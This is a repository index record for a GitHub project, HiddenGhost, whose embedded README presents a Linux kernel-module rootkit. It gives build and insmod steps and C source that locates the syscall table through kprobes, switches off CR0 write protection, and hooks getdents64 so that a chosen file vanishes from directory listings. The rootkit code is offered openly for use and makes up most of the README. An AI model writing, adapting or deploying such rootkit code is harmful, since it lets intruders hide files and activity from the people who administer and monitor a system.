{"id":20456229,"url":"https://github.com/thebigcicca/HiddenGhost","last_synced_at":"2025-05-08T21:31:42.528Z","repository":{"id":242444987,"uuid":"386371920","full_name":"BrunoCiccarino/HiddenGhost","owner":"BrunoCiccarino","description":"HiddenGhost is an new solution for find system call table with support for 5.7x kernels +","archived":false,"fork":false,"pushed_at":"2024-06-25T23:42:28.000Z","size":100,"stargazers_count":4,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-06-26T00:44:02.560Z","etag":null,"topics":["linux-kernel-hacking","linux-kernel-module","linux-rootkit","lkm","lkm-rootkit","rootkit","syscall","syscall-hook","syscalls"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BrunoCiccarino.png","metadata":{"files":{"readme":"README.adoc","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-15T17:25:23.000Z","updated_at":"2024-06-25T23:42:31.000Z","dependencies_parsed_at":"2024-06-14T02:04:23.170Z","dependency_job_id":null,"html_url":"https://github.com/BrunoCiccarino/HiddenGhost","commit_stats":null,"previous_names":["ch4r0nn/dantesghost","ch4r0nn/hiddenghost","brunociccarino/hiddenghost"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhost","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhost/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhost/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhost/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BrunoCiccarino","download_url":"https://codeload.github.com/BrunoCiccarino/HiddenGhost/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":224771848,"owners_count":17367219,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["linux-kernel-hacking","linux-kernel-module","linux-rootkit","lkm","lkm-rootkit","rootkit","syscall","syscall-hook","syscalls"],"created_at":"2024-11-15T11:21:54.441Z","updated_at":"2025-05-08T21:31:37.196Z","avatar_url":"https://github.com/BrunoCiccarino.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"== HiddenGhost\n \nHidden Ghost *is an new solution for find system call table with support for 5.7x kernels +*. Hidden Ghost finds the syscall table via the ```kallsyms_lookup_name``` module with the ```\u003clinux/kprobes.h\u003e``` headder.\n\nBefore starting the explanation of how the rootkit works in depth I will explain the basics.\n\n** Tested On:\n\n[✔️] Debian 12 6.7X amd64\n\n** Usage: \n\n```\n1) install the kernel headers:\n\nsudo apt install linux-headers-$(uname -r)\n\n2) Install Development Tools:\n\nsudo apt install build-essential\n\n3) Install the Kernel Development Kit:\n\nsudo apt install linux-headers-$(uname -r) linux-source\n\n4) Go to the /src directory:\n\ncd src\n\n5) Module Compilation:\n\nmake\n\n6) Load the module:\n\nsudo insmod main.ko\n\n7) Check if the module has been loaded:\n\ndmesg | tail -n 10\n\n```\n\nAfter these steps are completed, you should see this message:\n\nimage::img/HiddenGhost.png[]\n\n** What is Hooking:\n\nHooking is the act of redirecting/modifying a certain code stream, this redirect technique can be used for good and for bad, a big example of using this technique is mid function hooking This time I saw an example midFunction hook in the Unknown cheats forum that created a function ```jmp 0xE9``` at address ```pAddres``` I won't take much of your time explaining how it works and such because there are articles about it, I left two articles at the end of this readme, mine where I explain in depth about lkm and the one about MidFunction hook.\n\n** And how does it hook the syscall?\n\n* 1) Find the Syscalls Table:\n\n- The ``find_syscall_table`` function uses the kprobes module to find the address of the kernel syscall table (sys_call_table).\n\n```c\nunsigned long *find_syscall_table(void)\n{\n    typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);\n    kallsyms_lookup_name_t kallsyms_lookup_name;\n\n    register_kprobe(\u0026kp);\n    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;\n    unregister_kprobe(\u0026kp);\n\n    __syscall_table = (unsigned long*)kallsyms_lookup_name(\"sys_call_table\");\n    return __syscall_table;\n}\n```\n\n* 2) Unprotect Memory\n\n- The ``unprotect_memory`` function disables write protection on the page containing the syscall table, allowing the rootkit to modify the syscall table.\n\n```c\nstatic inline void unprotect_memory(void)\n{\n    write_cr0_forced(cr0 \u0026 ~0x00010000);\n}\n```\n\n* 3) Replace the Original Function\n\n- In ghost_init, the address of the original getdents64 syscall is saved and replaced with the address of the hook function (hook_getdents64).\n\n```c\nstatic int __init ghost_init(void)\n{\n    __syscall_table = find_syscall_table();\n    if (!__syscall_table) {\n        printk(KERN_INFO \"Error, syscall_table not found\");\n        return -1;\n    }\n\n    cr0 = read_cr0();\n    orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];\n    unprotect_memory();\n    __syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;\n    protect_memory();\n\n    printk(KERN_INFO \"Rootkit loaded: Syscall hooked\\n\");\n    return 0;\n}\n```\n\n* 4) Protect Memory\n\nAfter replacement, write protection is restored.\n\n```c\nstatic inline void protect_memory(void)\n{\n    write_cr0_forced(cr0);\n}\n```\n\n* 5) Interception and Manipulation\n\n- The hook function hook_getdents64 intercepts calls to getdents64, checks file names, and hides any file named file_to_hide. \n\n```c\nasmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {\n    int ret = orig_getdents64(fd, dirp, count);\n    struct linux_dirent64 *d, *kd, *kdirent = NULL;\n    unsigned long offset = 0;\n\n    if (ret \u003c= 0)\n        return ret;\n\n    kdirent = kzalloc(ret, GFP_KERNEL);\n    if (kdirent == NULL)\n        return ret;\n\n    if (copy_from_user(kdirent, dirp, ret)) {\n        kfree(kdirent);\n        return ret;\n    }\n\n    while (offset \u003c ret) {\n        d = (struct linux_dirent64 *)((char *)kdirent + offset);\n        if (strcmp(d-\u003ed_name, \"file_to_hide\") == 0) {\n            memmove(d, (char *)d + d-\u003ed_reclen, ret - offset - d-\u003ed_reclen);\n            ret -= d-\u003ed_reclen;\n        } else {\n            offset += d-\u003ed_reclen;\n        }\n    }\n\n    copy_to_user(dirp, kdirent, ret);\n    kfree(kdirent);\n    return ret;\n}\n```\n\n* 6) Unloading and Restoring\n\n- When unloading the module, the original syscall is restored:\n\n```c\nstatic void __exit ghost_exit(void)\n{\n    unprotect_memory();\n    __syscall_table[MY_NR_getdents] = (unsigned long)orig_getdents64;\n    protect_memory();\n\n    printk(KERN_INFO \"Rootkit unloaded: Syscall restored\\n\");\n}\n```\n\nlink of articles: \n\nhttps://github.com/Ch4r0nN/LKM-Exploration[LKM-Exploration Making drivers from basic to advanced]\n\n\nhttps://www.unknowncheats.me/forum/c-and-c-/67884-mid-function-hook-deal.html[Unknown Cheats]\n\nLinks to the repositories I based on:\n\nhttps://github.com/m0nad/Diamorphine[Diamorphine]\n\nhttps://github.com/xcellerator/linux_kernel_hacking[Linux Kernel Hacking]\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthebigcicca%2FHiddenGhost","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthebigcicca%2FHiddenGhost","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthebigcicca%2FHiddenGhost/lists"}